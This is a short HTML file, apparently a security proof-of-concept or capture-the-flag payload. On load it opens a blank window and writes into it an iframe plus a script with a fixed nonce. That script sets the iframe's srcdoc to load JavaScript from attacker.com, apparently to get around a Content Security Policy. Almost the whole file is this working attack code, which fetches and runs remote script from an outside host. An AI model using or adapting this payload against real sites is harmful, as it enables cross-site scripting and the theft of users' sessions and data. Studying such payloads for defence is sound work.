<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<script>
window.onload = function() {
    w=window.open("about:blank"); w.document.write("<iframe id=GGGgoMkXGGG src=about:blank><\/iframe><script nonce=123>GGGgoMkXGGG.addEventListener('load',()=>{GGGgoMkXGGG.srcdoc='<script src=https://attacker.com/static/static.js><\\/script>';},{once:true});<\/script>");
};
</script>
</body>
</html>
